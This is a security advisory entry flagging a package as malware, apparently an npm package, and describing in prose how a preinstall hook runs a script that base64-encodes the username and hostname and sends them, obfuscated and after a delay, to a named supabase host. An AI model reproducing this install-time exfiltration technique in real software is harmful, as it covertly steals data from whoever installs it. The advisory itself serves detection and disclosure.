The package is marked as malware by OSV: MAL-2026-2828 with source: amazon-inspector

Note: This report is updated by a verification record

The package exhibits multiple strong indicators of malicious behavior. The preinstall script executes node scripts/env-check.js, allowing arbitrary code execution during installation. Both index.js and env-check.js contain code that collects the username and hostname, encodes them using base64, and sends them to a remote server (baooreqyqjveumkkyddc.supabase.co). This data exfiltration is further obfuscated by encoding the hostname and path. A delayed execution of 120 seconds is used, potentially to evade detection. Error handling is suppressed to prevent logging of any issues during the HTTPS request. These multiple pieces of evidence strongly suggest that the package is malicious.